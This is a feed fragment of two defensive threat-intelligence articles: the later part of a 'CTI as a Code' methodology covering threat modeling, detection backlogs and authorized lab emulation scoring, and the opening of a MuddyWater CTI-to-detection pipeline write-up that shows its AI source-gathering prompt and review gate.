 └── detection-backlog.md<br>└── 07-deliverables/<br>    ├── executive-brief.md<br>    └── technical-brief.md</pre><h3>Step P2: Run the Intake</h3><p>Before you open any advisory or run any query, capture the commissioner’s requirements in a structured intake call.</p><p>→ <strong>Proactive Assessment — Intake</strong> — full intake form (trigger, crown jewels, detection posture, mandate, threat context, regulatory context), why each section matters, and how to commit the intake into the project git history.</p><h3>Step P3: Assess Trigger Intelligence</h3><p><strong>Files:</strong> 01-trigger-intelligence/triggers/TRG-NNN-name.md | <strong>Time:</strong> 2–4 h per trigger cycle</p><p>A trigger is an intelligence input that changes the threat assessment for this specific organization. Write one file per trigger:</p><pre># TRG-001 — CERT-IL CB-2025-041: AiTM Campaign Targeting Government Contractors<br>## What happened<br>CERT-IL advisory CB-2025-041 (2025-04-03) describes an active AiTM phishing campaign targeting<br>contractors with access to Israeli government identity and biometric systems. Three confirmed<br>victims in the municipal sector in March 2025. The adversary cluster replays intercepted session<br>tokens within 4–8 hours of interception.<br>## Source reliability<br>Source: CERT-IL - rating A (completely reliable; official government advisory from direct investigation)<br>Information: 1 (confirmed - CERT-IL investigated the victim cases directly)<br>Combined: High<br>## Relevance to THIS organization<br>- MyOrg operates contractor VPN with the same architecture described in CB-2025-041<br>- Contractor class accounts have direct read access to the biometric records database<br>- Two MyOrg contractors use the same IdP flagged in the advisory<br>- MyOrg's MFA is not enforced on VPN re-authentication for valid sessions - identical gap<br>## ATT&amp;CK techniques implied<br>- T1557 - AiTM session token interception<br>- T1078.001 - VPN authentication with stolen credentials<br>- T1048 - data exfiltration via authorized session (no alert triggered in victim cases)<br>## Detection action implied<br>PRIORITY: Verify whether VPN authentication logs are ingested into the SIEM.<br>If not - this is a P0 pipeline gap that blocks detection of the primary technique.<br>If yes - write AiTM detection rule immediately.<br>## Confidence<br>High - authoritative source, directly applicable to our architecture, confirmed active campaign.</pre><h3>Step P4: Crown Jewels Analysis</h3><p><strong>File:</strong> 02-crown-jewels/crown-jewels.md | <strong>Time:</strong> 2–4 h</p><p>Tier every asset by the business impact of compromise. Be specific — vague tier assignments produce vague threat models:</p><pre>## Tier 1 — Critical (compromise triggers regulatory notification or irreversible harm)<br>| Asset | System | Why Tier 1 | Notification trigger |<br>|---|---|---|---|<br>| Biometric records database | db-01 | 340K+ biometric records; Biometric Database Law §12 | Biometric Database Authority + INCD |<br>| Payment gateway | pay-gw-01 | PCI-DSS scope; real-time payment processing | BoI-CD 362 immediate notification |<br>| Active Directory | dc-01 | Domain takeover enables access to all Tier 1 systems | All downstream triggers |<br>| GovID authentication service | govid-svc-01 | National identity system; 2.1M citizen accounts | INCD mandatory notification |<br>## Tier 2 - High (enables attack on Tier 1)<br>| Asset | System | Attack path to Tier 1 |<br>|---|---|---|<br>| Contractor VPN gateway | vpn-gw-01 | Entry point; contractor accounts have db-01 read access |<br>| Contractor jump host | jump-01 | Pivot from DMZ to internal db-01 segment |<br>| Identity provider | idp-01 | Credential validation for all internal services |<br>| SIEM / logging infrastructure | siem-01 | Attacker visibility if compromised; evidence destruction risk |<br>## Tier 3 - Medium (operational impact, no regulatory trigger)<br>- Internal wikis and collaboration tools<br>- Development and staging environments (non-production data only)<br>- Monitoring dashboards<br><br>| Asset | System | Why Tier 1 | Notification trigger |<br>|---|---|---|---|<br>| Biometric records database | db-01 | 340K+ biometric records; Biometric Database Law §12 | Biometric Database Authority + INCD |<br>| Payment gateway | pay-gw-01 | PCI-DSS scope; real-time payment processing | BoI-CD 362 immediate notification |<br>| Active Directory | dc-01 | Domain takeover enables access to all Tier 1 systems | All downstream triggers |<br>| GovID authentication service | govid-svc-01 | National identity system; 2.1M citizen accounts | INCD mandatory notification |<br>## Tier 2 - High (enables attack on Tier 1)<br>| Asset | System | Attack path to Tier 1 |<br>|---|---|---|<br>| Contractor VPN gateway | vpn-gw-01 | Entry point; contractor accounts have db-01 read access |<br>| Contractor jump host | jump-01 | Pivot from DMZ to internal db-01 segment |<br>| Identity provider | idp-01 | Credential validation for all internal services |<br>| SIEM / logging infrastructure | siem-01 | Attacker visibility if compromised; evidence destruction risk |<br>## Tier 3 - Medium (operational impact, no regulatory trigger)<br>- Internal wikis and collaboration tools<br>- Development and staging environments (non-production data only)<br>- Monitoring dashboards</pre><h3>Step P5: Model Attack Scenarios</h3><p><strong>Files:</strong> 03-threat-model/scenarios/SCN-NNN-name.md | <strong>Time:</strong> 1–2 h per scenario</p><p>For each path from perimeter (or insider) to a Tier 1 asset, write a scenario. The scenario is not a story — it is a structured model that maps directly to detection tasks:</p><pre># SCN-001 — Contractor AiTM Phishing → Biometric Database Exfiltration<br>## Trigger basis<br>TRG-001 (CERT-IL CB-2025-041) - confirmed active campaign using this exact path<br>## Kill chain<br>| Step | Technique | Procedure | Current coverage |<br>|---|---|---|---|<br>| 1 | T1566.001 | Spearphishing link to spoofed VPN login page | Partial rule - browser-based phishing not covered |<br>| 2 | T1557 | AiTM proxy intercepts session token | No rule - VPN auth logs NOT in SIEM |<br>| 3 | T1078.001 | Token replay to VPN gateway | No rule - same pipeline gap |<br>| 4 | T1021.001 | RDP from jump host to db-01 | No rule - jump host Sysmon not collected |<br>| 5 | T1048.003 | Full-table SELECT; HTTPS exfil to C2 | No rule - DB audit log not in SIEM |<br>## Coverage verdict<br>0 of 5 techniques covered. All 5 require detection backlog entries.<br>3 of 5 are blocked by pipeline gaps (steps 2–4) - these require engineering work before rules can be written.<br>## Impact if scenario executes undetected<br>- 340K+ biometric records exfiltrated<br>- INCD and Biometric Database Authority notifications mandatory<br>- Estimated regulatory exposure: significant</pre><h3>Step P6: Build the Detection Backlog</h3><p><strong>File:</strong> 04-detection-backlog/detection-backlog.md | <strong>Time:</strong> 1–2 h</p><p>The detection backlog translates scenario analysis into sprint-ready engineering work. Every item has enough information to be picked up by a detection engineer without further context:</p><pre>| Pri | ID | Technique | Scenario | Pre-condition | Owner | Sprint | Status |<br>|---|---|---|---|---|---|---|---|<br>| P0 | ENG-001 | Pipeline | SCN-001 steps 2–3 | VPN auth logs must be ingested into SIEM before DET-B001/B002 can be written | Engineering | Sprint 1 | Blocked — pipeline |<br>| P0 | ENG-002 | Pipeline | SCN-001 step 5 | DB audit log must be ingested before DET-B003 | Engineering | Sprint 1 | Blocked — pipeline |<br>| P1 | DET-B001 | T1557 (AiTM) | SCN-001 step 2 | Requires ENG-001 | Detection | Sprint 2 | Waiting on ENG-001 |<br>| P1 | DET-B002 | T1078.001 | SCN-001 step 3 | Requires ENG-001 | Detection | Sprint 2 | Waiting on ENG-001 |<br>| P1 | DET-B003 | T1048.003 | SCN-001 step 5 | Requires ENG-002 | Detection | Sprint 2 | Waiting on ENG-002 |<br>| P2 | DET-B004 | T1021.001 | SCN-001 step 4 | Jump host Sysmon deployment needed | Detection | Sprint 3 | — |<br>| P2 | DET-B005 | T1566.001 | SCN-001 step 1 | Partial rule exists — needs browser phishing coverage added | Detection | Sprint 2 | Tuning existing rule |</pre><p><strong>P0 items are not detection rules — they are infrastructure prerequisites.</strong> The backlog separates these explicitly so the sprint plan is realistic: you cannot write an AiTM detection rule if the VPN logs are not in the SIEM. Making this visible prevents teams from reporting “rule written” while the actual gap remains open.</p><pre>git add .<br>git commit -m "PROJ-002: proactive complete — SCN-001 modeled, detection backlog 7 items (2 blocked on pipeline)"</pre><h3>Full Cycle Mode: Building a CTI Program</h3><p>Full Cycle applies when the task is not a single investigation but building the capability to run investigations continuously. It produces a governance structure, a PIR framework, and a collection plan.</p><pre>cp -r CTI_as_a_Code/templates/full-cycle/ programs/myorg-cti-program-2025/<br>cd programs/myorg-cti-program-2025/<br>git init &amp;&amp; git add . &amp;&amp; git commit -m "PROJ-003: full-cycle scaffold initialized"</pre><p>Before any program design work begins, run the intake to capture the sponsor’s mandate, stakeholder map, initial PIRs, and maturity target.</p><p>→ <strong>Full-Cycle Program — Intake</strong> — full intake form (program mandate, stakeholders, PIR register, collection requirements, sharing architecture, governance), why each section matters, and how to commit the intake as the program’s first artifact.</p><p><strong>Key outputs of full-cycle mode:</strong></p><p><strong>Stakeholder map</strong> — who receives what intelligence, at what classification level, on what schedule:</p><pre>| Stakeholder | Role | Products | TLP | Cadence |<br>|---|---|---|---|---|<br>| CISO | Executive sponsor | Strategic brief, program metrics | AMBER | Monthly |<br>| SOC Lead | Operational consumer | Tactical alert, IOC packages | RED | On-demand |<br>| Detection Engineering | Technical consumer | Sigma backlog, hunting hypotheses | RED | Weekly sprint |<br>| Legal / Compliance | Regulatory | Incident reports, regulatory notifications | AMBER | Per incident |<br>| CERT-IL | External sharing | Anonymized IOC packages | GREEN | Per incident |</pre><p><strong>PIR register</strong> — every PIR linked to a stakeholder decision:</p><pre>| ID | PIR | Stakeholder | Decision it drives | Review cadence |<br>|---|---|---|---|---|<br>| PIR-001 | Is the Iranian-nexus AiTM cluster from CERT-IL CB-2025-041 actively targeting our contractor VPN? | CISO | Contractor access architecture review | Monthly |<br>| PIR-002 | What is the current detection coverage rate across our top-10 adversary techniques? | SOC Lead | Sprint prioritization and backlog ordering | Bi-weekly |<br>| PIR-003 | Are any of our third-party suppliers under active targeting by nation-state actors? | Legal / Procurement | Supplier risk assessment and contract reviews | Quarterly |</pre><p><strong>Collection plan</strong> — sources mapped to PIRs, with gaps made explicit:</p><pre>| Source | PIRs | Reliability | Current status | Gap |<br>|---|---|---|---|---|<br>| CERT-IL advisories | PIR-001, PIR-003 | A/1 (High) | Active MOU — weekly digest | None |<br>| Internal SIEM alerts | PIR-002 | A/1 (High) | Active | VPN logs not ingested — ENG-001 |<br>| Recorded Future | PIR-001, PIR-002 | B/2 (Medium-High) | No subscription | Procurement Q3 2025 |<br>| Sector ISAC | PIR-003 | B/2 (Medium-High) | Membership lapsed | Renewal in progress |</pre><p>Collection gaps that block PIR answers are tracked as program risks with owners and deadlines — not just technical notes. A PIR that cannot be answered because a log source is not ingested is a program failure, not a SIEM problem.</p><h3>Adversary Emulation Mode: Validating Coverage</h3><p>Emulation runs after detections have been built. It answers the question: do these rules actually work against a real adversary executing these techniques?</p><pre>cp CTI_as_a_Code/templates/adversary-emulation.md \<br>   exercises/myorg-emulation-q3-2025.md</pre><p><strong>Build the emulation plan from a CTI report:</strong></p><pre># Emulation Plan — Operation Desert Cipher (Q3 2025)<br>## Authorization<br>Authorized by: CISO - ref: AUTH-2025-Q3-001<br>Scope: JUMPHOST-LAB and TARGET-LAB only; no production systems<br>Date: 2025-07-14 through 2025-07-16<br>## Threat intelligence basis<br>CTI report: training/A04-emulation-techpay/01-cti-report/operation-desert-cipher.md<br>Actor: Assessed Iranian-nexus cluster<br>## Module table<br>| # | Technique | Procedure | Tool | Expected alert | Pre-check |<br>|---|---|---|---|---|---|<br>| MOD-01 | T1566.001 | Send .docx with embedded macro | GoPhish | Email gateway + EDR | Email gateway logs ingested? |<br>| MOD-02 | T1557 | AiTM proxy against lab VPN portal | Evilginx2 | VPN auth anomaly rule | VPN logs in SIEM? |<br>| MOD-03 | T1078.001 | Replay captured session token | curl | Anomalous auth rule | DET-003 deployed? |<br>| MOD-04 | T1021.001 | RDP from jump host to target | mstsc | Lateral movement rule | Jump host Sysmon running? |<br>| MOD-05 | T1059.001 | Execute PowerShell from RDP session | powershell.exe | T1059 rule | DET-005 deployed? |<br>| MOD-06 | T1048.003 | Exfil dummy file via HTTPS | curl | Egress detection | DB audit rule deployed? |<br>| MOD-07 | T1070.001 | Clear Windows event logs | wevtutil | Log-clearing alert | DET-007 deployed? |</pre><p><strong>Execute and score:</strong></p><pre># Post-execution: scan lab evtx with all Sigma rules<br>hayabusa csv-timeline \<br>  --directory ./lab-evtx/ \<br>  --output emulation-results-$(date +%Y%m%d).csv \<br>  --profile verbose<br># Check which modules fired<br>grep -E "T1557|T1078|T1059|T1048|T1021|T1070|T1566" emulation-results-*.csv</pre><p><strong>Coverage matrix with root cause for every FAIL:</strong></p><pre>| Module | Technique | Result | Root Cause | Remediation |<br>|---|---|---|---|---|<br>| MOD-01 | T1566.001 | PARTIAL | Rule fired; attachment hash missing — email gateway log field not parsed | Fix Logstash parser for email gateway |<br>| MOD-02 | T1557 | FAIL | Rule not deployed — VPN log pipeline not complete at exercise date | ENG-001 still open; reschedule after pipeline completes |<br>| MOD-03 | T1078.001 | PASS | Alert within 90 seconds | — |<br>| MOD-04 | T1021.001 | PASS | Alert within 2 min | — |<br>| MOD-05 | T1059.001 | PASS | Alert within 45 seconds | — |<br>| MOD-06 | T1048.003 | FAIL | Data source missing — DB audit log pipeline not complete | ENG-002 still open |<br>| MOD-07 | T1070.001 | PASS | Alert within 20 seconds | — |<br>## Summary: 4 PASS (57%) | 1 PARTIAL (14%) | 2 FAIL (29%)<br>## Both FAILs trace to open engineering tickets, not missing detection rules.</pre><h3>Git Discipline — The Same for All Modes</h3><p>The git log is the audit trail. Commit phase by phase with informative messages:</p><pre># After intake<br>git add 00-scope/intake.md<br>git commit -m "PROJ-001: intake — initial hypothesis AiTM contractor theft; 3 PIRs identified"<br># After scope sign-off<br>git add 00-scope/scope.md<br>git commit -m "PROJ-001: scope - signed off by CISO 2025-03-18; TLP AMBER; legal hold"<br># After evidence inventory<br>git add 01-evidence/<br>git commit -m "PROJ-001: evidence - 5 sources, GAP-001 (4h Sysmon 03-17), checksums committed"<br># After timeline and claims<br>git add 03-analysis/<br>git commit -m "PROJ-001: analysis - 16 events, 5 claims; PIR-001 answered YES (CL-002)"<br># After ATT&amp;CK mapping<br>git add 03-analysis/attck-mapping/<br>git commit -m "PROJ-001: ATT&amp;CK mapping - 6 techniques, 2 rule-missing, 2 data-missing, 1 incomplete"<br># After detections validated<br>git add 04-detections/<br>git commit -m "PROJ-001: detections - DET-001 to DET-004 validated PASS via Hayabusa"<br># After deliverables complete<br>git add 05-deliverables/<br>git commit -m "PROJ-001: deliverables - executive brief and SOC handoff; INCD notification ready"</pre><p><strong>Rules:</strong></p><ul><li>One commit per completed phase — not one bulk commit at the end</li><li>Never edit a committed evidence file — create a new amendment document and commit that</li><li>Commit messages: project ID + phase + factual one-line summary of what changed</li><li>When an assessment changes (e.g., CL-003 confidence downgraded), commit the change with a message explaining why</li></ul><h3>Minimum-Viable Path: No Lab Required</h3><p>The full methodology runs without Docker. Replace each lab component:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tR6BsLsvAFquFYPRJMsbAA.png"></figure><p>The intake template, evidence labels, claims ledger, ATT&amp;CK gap taxonomy, and git commit discipline apply identically with or without the lab stack.</p><h3>The Ecosystem</h3><p>CTI as a Code is one part of a practitioner ecosystem:</p><ul><li><a href="https://anpa1200.github.io/CTI_as_a_Code/">CTI as a Code</a> — Lab stack, investigation scaffolds, and training assignments. Use when running an investigation or building detection coverage.</li><li><a href="https://anpa1200.github.io/cti-analyst-field-manual/">CTI Analyst Field Manual</a> — Analytic tradecraft standard. Use when you need the full methodology behind evidence labels, PIR design, attribution, and CTI-to-detection.</li><li><a href="https://anpa1200.github.io/israel-government-threat-actors-cti/">Israel Government Threat Actors CTI</a> — Israeli sector threat knowledge base. Use when working on any Israeli government, CII, or public sector engagement.</li><li><a href="https://anpa1200.github.io/customer-driven-ai-cti-project/">Customer-Driven AI CTI</a> — CTI delivery methodology. Use when turning CTI work into a managed customer engagement with quality gates.</li><li><a href="https://anpa1200.github.io/CTI_as_a_Code/ecosystem">Ecosystem page</a> — End-to-end cross-project workflows.</li></ul><p>See the <a href="https://anpa1200.github.io/CTI_as_a_Code/ecosystem">Ecosystem page</a> for end-to-end cross-project workflows.</p><h3>Where to Start</h3><pre># Get the project<br>git clone https://github.com/anpa1200/CTI_as_a_Code.git<br>cd CTI_as_a_Code<br># Reactive: copy the template, run intake, start scoping<br>cp -r templates/reactive/ ../my-first-investigation/<br>cd ../my-first-investigation/<br>git init &amp;&amp; git add . &amp;&amp; git commit -m "PROJ-001: scaffold initialized"<br>cp 00-scope/scope.md 00-scope/intake.md   # use the intake template from this article<br># fill in intake.md during the first call, then scope.md after<br># Or open a fully worked example to see the complete methodology applied<br>ls CTI_as_a_Code/training/A01-reactive-lifetech/</pre><p>The 8 training assignments in the repository are fully populated: project brief, synthetic evidence data, all analytical files, and worked solutions. <strong>A01</strong> (reactive, 52-hour Iranian-nexus breach) is the best starting point for reactive work. <strong>A02</strong> (proactive, nation-state telecom targeting) for proactive. <strong>A04</strong> and <strong>A08</strong> for adversary emulation.</p><p>The methodology in this article is exactly what runs through all 8 assignments.</p><p><em>Tags: Threat Intelligence · CTI · Detection Engineering · Incident Response · Sigma · MITRE ATT&amp;CK · Blue Team · Cybersecurity</em></p><h4>Follow My Work</h4><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><p><strong>Andrey Pautov</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=dda5ef496a46" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46">CTI as a Code: Complete Step-by-Step Methodology</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana]]></title>
<description><![CDATA[11 validated detections from public sources, OpenCTI graph, and a one-command labTable of ContentsMost threat actor writeups stop too early. They describe the group, list ATT&CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: what do I actually do with th...]]></description>
<link>https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>11 validated detections from public sources, OpenCTI graph, and a one-command lab</em>Table of Contents</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HvRb4_s15JQ6FkA9ng-8w.png"></figure><p>Most threat actor writeups stop too early. They describe the group, list ATT&amp;CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: <em>what do I actually do with this on Monday?</em></p><p>Operation Desert Hydra is an answer to that question.</p><p>This article documents a full CTI-to-detection pipeline focused on <strong>MuddyWater</strong> — an Iranian state-linked actor (MOIS) that has been targeting Israeli government, defense, and critical infrastructure organizations since at least 2019. By the end, you’ll have 11 detection records, 12 Kibana proof screenshots, and a working lab you can deploy with a single command.</p><p>Everything is on my GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra">github.com/anpa1200/operation-desert-hydra</a></p><p><a href="https://github.com/anpa1200/operation-desert-hydra">GitHub - anpa1200/operation-desert-hydra: OpenCTI-based CTI-to-Detection Knowledge Graph for Iranian activity against Israeli organizations</a></p><ol><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#86dc"><strong>Why MuddyWater?</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#aadd"><strong>The Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c6f3"><strong>Phase 1: Source Gathering</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#205e"><strong>Phase 2: Procedure Dataset</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#fb48"><strong>Phase 3: OpenCTI Knowledge Graph</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c2e1"><strong>Phase 4: Detection Atlas</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8ce1"><strong>Phase 5: Validation Lab</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#0a42"><strong>Validation Results Summary</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8cf4"><strong>Phase 6: Coverage Matrix</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dfaa"><strong>What Defenders Should Do Right Now</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#b8cc"><strong>Reproduce It Yourself</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dbb0"><strong>Production Scars</strong></a></li></ol><h3>Why MuddyWater?</h3><p>Three reasons:</p><ol><li><strong>Rich public reporting.</strong> CISA, Israel’s INCD, ClearSky, Deep Instinct, Mandiant, and Proofpoint have all published detailed technical analysis. This gives enough procedure-level specificity to engineer real detections.</li><li><strong>Consistent playbook.</strong> Across five years of reporting, the same pattern recurs: spearphishing → scripting engine → encoded PowerShell → RMM tool. The consistency makes it detectable.</li><li><strong>Relevant geography.</strong> The actor consistently targets Israeli organizations — a geography with high analytical value and underserved public detection coverage.</li></ol><h3>The Pipeline</h3><p>The project enforces a chain from source to Kibana screenshot:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NDsnhzE7S-lzy0fSIOZrsw.png"></figure><pre>source → claim → procedure → ATT&amp;CK mapping → telemetry requirement<br>  → detection pseudologic → benign simulation → lab result → coverage score</pre><p>No step is skipped. Every claim has a source. Every detection has a validation case. Every PASS has a screenshot.</p><h3>Phase 1: Source Gathering</h3><p>The first step is source discovery, not detection writing.</p><h4>Traditional Source Gathering — and Why It’s Not Enough Alone</h4><p>The standard workflow for CTI source gathering looks like this: run keyword searches (Google, Google Dorks, site: operators for known vendor blogs), check your Threat Intelligence Platform for existing reports on the actor, subscribe to vendor RSS feeds, pull ISAC/ISAO advisories, and query your organization’s TIP for any existing indicator sets or finished intelligence reports tagged to the actor.</p><p>For a mature, well-documented actor like MuddyWater this gets you to maybe 15–20 well-known sources quickly — the CISA advisory, the MITRE ATT&amp;CK page, two or three vendor blog posts you already knew about. The problem is coverage holes: you’ll reliably find sources that are already in your network’s vocabulary and miss the ones that aren’t. A CERT-IL PDF published in Hebrew and linked only from a government portal, a Group-IB campaign teardown behind a partial paywall, or a 2020 ClearSky report that predates your current TIP subscription window — all of these can fall out of a manual search pass.</p><p>TIPs compound this in a specific way: they surface what has already been ingested and tagged. If a source was never promoted into your TIP (because it was published before the subscription started, or because no analyst had time to import it), it is invisible inside the platform. The TIP is authoritative for what it knows, not for the universe of available sources.</p><h4>AI research</h4><p>The parallel AI research pass was not a replacement for traditional gathering — it was a coverage supplement. After both approaches ran, the traditional pass and the AI outputs were merged into the same deduplication step. The AI outputs added approximately 40 sources beyond what a manual search surfaced; traditional search added discipline about sources the models hallucinated (fabricated URLs, mis-attributed PDFs). Neither was sufficient alone.</p><p>I ran parallel deep-research passes using Gemini and OpenAI, both given the same prompt. Each returned a candidate source register. Both outputs were compared, deduplicated (71 candidates → 8 promoted), and the surviving sources were manually acquired and reviewed before anything entered the dataset.</p><h4>The Actual Prompt</h4><p>This is the exact prompt used — both models received it verbatim:</p><pre>You are a senior CTI researcher and source-validation analyst. For Operation Desert Hydra,<br>gather the best public sources on MuddyWater / Seedworm / Mango Sandstorm / TA450 and<br>related Iranian activity against Israeli organizations. Goal: create a source register for<br>an OpenCTI-based CTI-to-detection knowledge graph:<br>Source → Actor → Campaign → Procedure → ATT&amp;CK Technique → Observable → Log Source<br>→ Detection → Validation → Coverage.<br>Search MITRE ATT&amp;CK, CISA/FBI/NSA, Israel National Cyber Directorate, Microsoft,<br>Google/Mandiant, ESET, Check Point, ClearSky, Unit 42, Proofpoint, SentinelOne,<br>Recorded Future, Symantec, Talos, Trend Micro, Kaspersky, Cloudflare/Hunt.io/DomainTools,<br>GitHub, and academic sources.<br>Include secondary comparison actors only as comparison: APT34, APT35/Charming Kitten/Mint<br>Sandstorm, CyberAv3ngers, Agrius. Do not merge actors unless a source explicitly supports<br>overlap.<br>For every source, return this YAML structure:<br>  id, title, publisher, url, direct_download_url, download_type, publication_date,<br>  access_date, actor_claims, source_type, reliability, relevance flags for<br>  actor_profile/procedures/malware/infrastructure/detections/validation_lab/opencti_modeling,<br>  key_entities, key_attck_techniques, source_summary, use_for_project, limitations.<br>Provide direct PDF/STIX/JSON/CSV/GitHub raw links where available; if unavailable write<br>direct_download_url: none_found. Do not invent URLs or dates.<br>Use evidence labels:<br>  Observed = directly shown in telemetry/sample/log/screenshot/source artifact<br>  Reported = stated by source<br>  Assessed = source judgment<br>  Inferred = analyst conclusion from multiple cited facts<br>  Gap = unknown or not proven<br>Do not upgrade source claims, do not treat ATT&amp;CK mapping as attribution evidence, do not<br>treat shared tooling as actor identity proof, and do not claim detection coverage without<br>validation.<br>Search exact terms including:<br>  MuddyWater Iran MOIS, MuddyWater Seedworm, MuddyWater Mango Sandstorm,<br>  MuddyWater TA450, MuddyWater POWERSTATS, PowGoop, MuddyViper, MuddyWater Israel,<br>  Israeli organizations, PowerShell, RMM, phishing, spearphishing, Exchange CVE-2020-0688,<br>  CVE-2017-0199, MITRE ATT&amp;CK, CISA FBI NSA advisory, Mango Sandstorm Microsoft,<br>  TA450 Proofpoint, Seedworm Symantec, ESET, ClearSky, Unit 42, Check Point, Mandiant,<br>  SentinelOne, Recorded Future, Talos, Trend Micro, Kaspersky;<br>  also: APT34 Israel, APT35 Israel, Mint Sandstorm Israel, CyberAv3ngers Israel,<br>  Agrius Israel, Iranian threat actors Israeli organizations.<br>Output only these sections:<br>  1) Executive Source Assessment<br>  2) High-Priority Source Register with 10-20 best sources in YAML<br>  3) Extended Source Register<br>  4) Direct Downloads Table<br>  5) Actor Alias / Overlap Notes<br>  6) Procedure Extraction Candidates grouped by tactic with source_ids, evidence_label,<br>     ATT&amp;CK candidate, required telemetry, detection opportunity, validation_possible<br>  7) OpenCTI Modeling Candidates<br>  8) Detection Engineering Opportunities marked candidate only<br>  9) Gaps And Manual Review Items<br>The final output must be usable to seed data/sources.yaml, data/procedures.yaml,<br>docs methodology, OpenCTI import plan, and detection atlas.</pre><h4>What the Prompt Is Designed to Do</h4><p>A few decisions worth explaining:</p><p><strong>Output schema in the prompt.</strong> Asking for a specific YAML field list (id, title, publisher, url, direct_download_url…) forces the model to either produce usable data or leave a visible blank — no vague summaries. direct_download_url: none_found is the required answer when a URL doesn't exist, which prevents the model from inventing one.</p><p><strong>Evidence labels baked in.</strong> The five labels (Observed / Reported / Assessed / Inferred / Gap) are defined in the prompt so the model applies them consistently and the output is ready to feed directly into data/procedures.yaml without reformatting.</p><p><strong>Explicit anti-hallucination rules.</strong> “Do not invent URLs or dates.” “Do not upgrade source claims.” “Do not treat ATT&amp;CK mapping as attribution evidence.” These are not just principles — they are instructions the model can fail visibly on, which makes QA faster.</p><p><strong>Parallel models, same prompt.</strong> Running Gemini and OpenAI on the same prompt and comparing outputs catches source fabrications: if one model lists a URL the other doesn’t, that URL gets verified before it enters the register. Two models that agree independently on a source add confidence; one model alone that lists something unusual is a flag.</p><h4>The Review Gate</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p--8CFcThnLuDmZiNyOdQg.png"></figure><p>Every source that came out of the AI output went through this checklist before being promoted into data/sources.yaml:</p><ul><li>Is the URL real and accessible?</li><li>Is the publication date accurate?</li><li>Does the content actually describe MuddyWater procedures (not just mention the name)?</li><li>Is there at least one procedure-level claim (not just “actor uses PowerShell”)?</li><li>Is the actor identification explicit or inferred from shared tooling only?</li></ul><p>71 candidates → 8 government/vendor sources promoted. The rest were duplicates, secondary summaries, or sources that named the actor without procedure-level specificity.</p><h4>Research Artifacts (All in the Repo)</h4><p>Every file from the source gathering workflow is version-controlled and publicly accessible:</p><ul><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/Gemini-research.md"><strong>Gemini-research.md</strong></a> — Raw Gemini deep-research output: candidate source register in YAML, procedure extraction candidates, OpenCTI modeling candidates, detection opportunities, gaps.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/openAI-research.md"><strong>openAI-research.md</strong></a> — Raw OpenAI deep-research output: executive assessment, high-priority sources, extended source register, direct download list, actor alias notes.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/relevant-research-list.md"><strong>relevant-research-list.md</strong></a> — Deduplicated candidate list after comparing both model outputs: 71 sources, acquisition targets for Step 5.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-acquisition-report.md"><strong>source-acquisition-report.md</strong></a> — Results of the automated fetch run: HTTP status, content type, file size, and extraction status for all 71 sources.</li><li><a 